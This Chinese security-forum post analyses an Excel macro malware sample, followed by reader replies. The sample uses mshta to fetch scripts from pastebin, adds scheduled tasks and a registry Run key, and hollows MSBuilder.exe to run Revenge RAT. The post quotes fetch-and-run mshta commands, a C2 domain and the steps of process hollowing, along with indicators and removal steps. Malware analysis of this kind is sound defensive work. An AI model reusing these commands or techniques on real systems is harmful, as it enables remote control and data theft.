吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 37398|回复: 128
收起左侧

[PC样本分析] xls宏病毒,程序不落地创建傀儡进程实现远控

    [复制链接]
Yennfer_ 发表于 2019-9-21 21:17
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Yennfer_ 于 2019-9-24 09:47 编辑

萌新分析,很多不足,请大佬们提出问题,共同学习。
基本信息
  
FileName  
  
FileSize  
  
FileType  
  
MD5  
  
Order_679873892xls  
  
47,4722 Byte  
  
Rat  
  
7641fef8abc7cb24b66655d11ef3daf2  

简介
病毒是一个宏病毒,点击启用宏后会通过mshta.exe来访问url,得到要执行的代码,病毒会创建计划任务与设置开机自启,通过powershell执行代码,从url得到两段PE数据,通过宏加载第一个PE文件,然后通过第一个PE文件创建傀儡进程,傀儡进程是一个远控
流程图
9-21.png
详细分析
解密
病毒会调用mshta.exe  http://bit.ly/8hsshjahassahsh 打开网站后,发现是空白,在浏览器F12,查看网络请求,刷新页面
111.png

往下滑,找到script代码,复制出来,复制到浏览器的console
112.png

去掉结尾的</script>,把unscape之前的内容改为console.log(,输出解密结果
113.png

StrReverse作用是使字符串反序,整理一下
114.png

最后会执行命令  WScript.Shell.RUN mshta http://www.pastebin.com/raw/nv5d9pYu
访问这个url后会发现这个页面已经挂了,但是在ANYRUN有人跑过这个样本,可以看见传回的参数
115.png

同样的方法在console跑一遍,然后整理一下
116.png
结束进程
第一段代码,调用CMD关闭进程winword.exe、excel.exe、MSPUB.exe、POWERPNT.exe
117.png
创建计划任务
第二段代码,创建一个计划任务,名为Windows Update,每60分钟执行一次,执行的内容是
mshta.exehttp://pastebin.com/raw/vXpe74L2
118.png
解密计划任务执行的内容
在浏览器打开url后,全都是混淆的代码
119.png

用一样的方法在Console里面用Console.log输出出来
120.png

复制到notepad++,看见代码最下面有个replace
121.png

按Ctrl+H将中间的字符串替换掉
122.png

得到两个字符串,用StrReverse函数将字符串反过来,最后是用powershell执行这段代码
123.png

代码解密出来为
124.png

利用powershell执行,第三行的代码来自url https://pastebin.com/raw/wMG90xwi
125.png

经过解密后:得到一个MZ头的PE数据
126.png

第四行的代码url为 https://pastebin.com/raw/W455MkAZ
127.png

经过解密后,也可以得到MZ开头的数据
128.png
给创建傀儡进程传参
这里先创建一个实例,类和方法都来自第一段数据dll中,然后传入两个参数,第一个是创建的进程名“MSBuiler.exe”,第二个参数是第二段获取的PE结构数据
168.png
调用powershell,执行上面代码
130.png

第二段代码内容:
131.png

创建计划任务
访问 http://pastebin.com/raw//JdTuFmc5 获得要执行的代码
133.png

和前面一样,改成console.log
134.png

解密之后,发现与上一段代码相同,只是计划任务时间从60分钟运行一次,变成了300分钟运行一次修改注册表
第四段代码修改注册表,内容是http://pastebin.com/raw/CGe3S2Vf取回的内容
135.png

136.png

一样,放进console里面,改成console.log,解密出的代码如图

137.png
最后还是和前两段一样的内容,在注册表自启动中写入,利用Powershell执行代码
138.png

反混淆
通过前面MSBuilder.exe编译可以得到两个PE文件,一个DLL,一个EXE,都是用.net编译,都可用de4dot反混淆

139.png
反混淆后使用dnSpy查看dll文件,发现其中还是有很多混淆,是ConfuerEX,用工具解一下ConfuerEX混淆
解混淆之前:
140.png

解混淆之后:
141.png

在JS代码最后,会调用.dll中的类和方法

142.png
143.png
创建傀儡进程
在Dodo函数传入两个参数,第一个是JS代码中写的MSBuilder,第二个是JS代码中的$f,就是前面解密出的exe文件
144.png

在五个目录下查找MSBuilder.exe
145.png

当查找到MSBuilder后,就执行下面的代码
146.png

这个地方调用了tickleme函数,tickleme函数又调用了PEHeaderE和FUN函数
147.png

PEHeaderE函数:
148.png

FUN函数里又调用了Smethod_0函数,传入的第一个参数是MSBuidler.exe第二个参数是exe的十六进制数据
149.png

Smethod_0函数,先创建了一个MSBuilder的进程
150.png

获取到EXE的PE头和ImageBase
151.png

判断是32位系统或64位系统,调用获取线程上下文函数
152.png

从内存中读取4字节数据,然后卸载映像,清空内存,方便后面注入
153.png

得到exe ImageBase的大小然后申请对应大小的空间
154.png

在申请的空间中写入exe的header
155.png

然后获取到节表,遍历写入节表的所有节
156.png
157.png


将前面获取到的线程上下文放回,然后唤醒线程,完成创建傀儡进程,执行exe里的内容
158.png
EXE
exe中可以看见C2服务器信息、互斥量、ID等信息
159.png

进来先找到main函数
163.png

.SCG就是new的自己,然后再调用Execute()函数,Execute函数内分别是This.SC、This.PT、This.INST三个函数,每个函数创建了一共线程,执行不同的代码
164.png
165.png
其中包含有对C2服务器的TCP链接
166.png
获得主机各种信息包括病毒ID、IP、主机名、系统信息、内存、杀软信息等,并用key值(lunlaylo)做分隔符,然后发送到服务器
167.png
谷歌了一下互斥量“RV_MUTEX-WindowsUpdateSysten32”,发现是一个成熟的远控,名叫” Revenge Rat”
样本溯源
  
File Name  
  
MD5  
  
Order_679873892xls  
  
7641fef8abc7cb24b66655d11ef3daf2  
  
.dll  
  
d1726dc5808c22be63507e06bbdc087  
  
.exe  
  
esd785a808f7272fb79E33a66570d844  

  
C2:  
  
meandmyjoggar.duckdns.org  
  
URL:  
  
http://www.pastebin.com/raw/nv5d9pYu  
  
  
  
http://pastebin.com/raw/vXpe74L2  
  
  
  
https://pastebin.com/raw/W455MkAZ  
  
  
  
http://pastebin.com/raw//JdTuFmc5  
  
  
  
http://pastebin.com/raw/CGe3S2Vf  
  
MUTEX:  
  
RV_MUTEX-WindowsUpdateSysten32  
查杀方案
删除注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate
删除名为Windows Update和Update的调用mshta.exe的计划任务
结束进程“MSBuilder.exe
总结
病毒使用excel中的宏执行代码,执行的代码都是从url中获取然后解密出来得到,添加的自启动或计划任务也没有程序落地,每次运行都从url得到数据创建一个傀儡进程实现远控

免费评分

参与人数 89吾爱币 +83 热心值 +82 收起 理由
ladfe901116 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
jyt1991 + 1 用心讨论,共获提升!
慕容环环 + 1 用心讨论,共获提升!
红云飞袖 + 1 用心讨论,共获提升!
lsj凌松 + 1 一点看不懂就觉得很牛!
假助天下第一 + 1 用心讨论,共获提升!
鸽吻与鸽舞 + 1 + 1 我很赞同!
花二娘 + 1 + 1 今天宏中病毒,默认后缀xlsx变xlsm了,如何删除回复之前的文件,虽然有备份.
BEdasabi + 1 + 1 谢谢@Thanks!
牧鱼龙 + 1 + 1 用心讨论,共获提升!
sainoa + 1 + 1 我很赞同!
840097782 + 1 + 1 热心回复!
4oo4 + 1 + 1 用心讨论,共获提升!
爱情避风港a + 1 用心讨论,共获提升!
jerkyman + 1 + 1 用心讨论,共获提升!
吾爱Po解啊 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Jq1212 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
mf1359 + 1 + 1 热心回复!
zswseu + 1 + 1 我很赞同!
staty + 1 + 1 用心讨论,共获提升!
Tomcrack520 + 1 用心讨论,共获提升!
gym_168 + 1 + 1 热心回复!
ch12 + 1 + 1 谢谢@Thanks!
nhy1989 + 1 + 1 我很赞同!
xsmxsm + 1 + 1 我很赞同!
99910369 + 1 + 1 用心讨论,共获提升!
SpaceX + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
FoundWay + 1 + 1 用心讨论,共获提升!
oudy + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
luzhiyao + 1 我很赞同!
weki + 1 + 1 谢谢@Thanks!
WZCLCY + 1 我很赞同!
九重桂妖 + 1 谢谢@Thanks!
开光财神爷 + 1 + 1 不懂,很牛逼的样子
Clear杰杰 + 1 大佬厉害,收徒弟吗
道极承天 + 1 + 1 看完分析我决定好好学习编程了,不然代码都看不懂
王紫 + 1 + 1 我很赞同!
Minesa + 1 + 1 用心讨论,共获提升!
qq499216557 + 1 + 1 牛批,大神牛批。
★殇絮↘_溫渘☆ + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
朱朱你堕落了 + 3 + 1 膜拜大佬,就是纯粹给你加分的。
w92vv + 1 + 1 厉害了
爱拍阴天 + 1 + 1 我很赞同!
0xFF + 1 + 1 鼓励转贴优秀软件安全工具和文档!
gaosld + 1 + 1 用心讨论,共获提升!
xuing + 1 + 1 谢谢@Thanks!
极品黑车 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
涛之雨 + 1 + 1 用心讨论,共获提升!
华科A + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Avenshy + 1 + 1 用心讨论,共获提升!
22222 + 1 + 1 我很赞同!
wapjphl + 1 + 1 用心讨论,共获提升!
soyiC + 1 + 1 用心讨论,共获提升!
crysky7ye + 1 + 1 你真厉害。
daniel7785 + 1 用心讨论,共获提升!
4everlove + 1 + 1 用心讨论,共获提升!
N0LL + 1 + 1 谢谢@Thanks!
Spareks + 1 + 1 用心讨论,共获提升!
诸葛阳明 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Acker + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
po1718 + 2 + 1 必须点赞!
xiaofengzi + 1 + 1 用心讨论,共获提升!
wg521125 + 1 + 1 看的一阵头大,不知不觉我都不知道中了多少病毒木马了
LASSAFEVER + 1 + 1 用心讨论,共获提升!
男猫 + 1 + 1 用心讨论,共获提升!
软软? + 1 + 1 热心回复!
天空藍 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Chlrun + 1 + 1 我很赞同!
2019ghua + 1 + 1 解剖得很细致,大神多出点入门级的分析 ,请教PE文件是啥文件
Minami + 1 + 1 用心讨论,共获提升!
tz_being + 1 + 1 我很赞同!
PearlyNautilus + 1 用心讨论,共获提升!
老白啊 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
少林大虾 + 1 热心回复!
lk19870906 + 1 我很赞同!
yzlovew + 1 + 1 加精警告
zhan + 1 + 1 谢谢@Thanks!
bakaest + 1 + 1 第一次听说Revenge rat
jfyhob + 1 + 1 用心讨论,共获提升!
爱无悔 + 1 + 1 用心讨论,共获提升!
wanmei + 2 + 1 用心讨论,共获提升!
冷孤幽 + 1 + 1 用心讨论,共获提升!
asd42450 + 1 + 1 我很赞同!
猴子丶 + 1 + 1 谢谢@Thanks!
冰雪冬樱250 + 1 + 1 谢谢@Thanks!
妖寒 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Blank空白 + 1 + 1 还能说什么呢?大老牛逼
漂泊的雪 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
危大人 + 1 + 1 一点看不懂就觉得很牛

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

gym_168 发表于 2019-10-28 20:27
Yennfer_ 发表于 2019-9-23 10:04
是的,就是excel里面的宏,不过office现在默认是禁止的,只要你不点“启用宏”,就应该没啥问题

vba也有防不启用宏文件就不能打开的方法,换句话说在打开文件时,如果你不运行宏,那文件就会自动关闭不让你用
 楼主| Yennfer_ 发表于 2019-9-23 10:06
chmod755 发表于 2019-9-23 09:54
楼主分析的很详细,其实这种调用powershell的,偷个懒,直接去找最后一行的run  把它替换成写入到文件,不 ...

powershell 运行的是mshta url, 中途每一行代码都是url,当时看昏了就没想到,学习了哈哈
战言灬永不败 发表于 2019-9-21 21:32
完全看不懂大佬在说什么,但还是要支持一下!
ncic 发表于 2019-9-21 22:59
看标题很牛进来的,不明觉厉了!
冰雪冬樱250 发表于 2019-9-22 09:15
虽然看不到懂,但支持一下
Hmily 发表于 2019-9-22 09:21
空间大小限制没起到有用的地方,倒是带来了麻烦,晚点我直接取消,抱歉。

免费评分

参与人数 1热心值 +1 收起 理由
涛之雨 + 1 H大辛苦了!活捉H大!(滑稽护体,溜!)

查看全部评分

wanmei 发表于 2019-9-22 10:48
真正的大佬。
hercity 发表于 2019-9-22 10:49
感谢大佬的研究。我虽然看不懂,但觉得对我有巨大帮助,谢谢大佬。添加收藏了。辛苦了
Peacefuler 发表于 2019-9-22 12:29
感谢分享,看不懂也支持一下。
6263085 发表于 2019-9-22 12:53
看标题很牛进来的,不明觉厉了!进来支持一下
limit81995 发表于 2019-9-22 14:21
看不懂{:1_937:
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-15 13:58

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表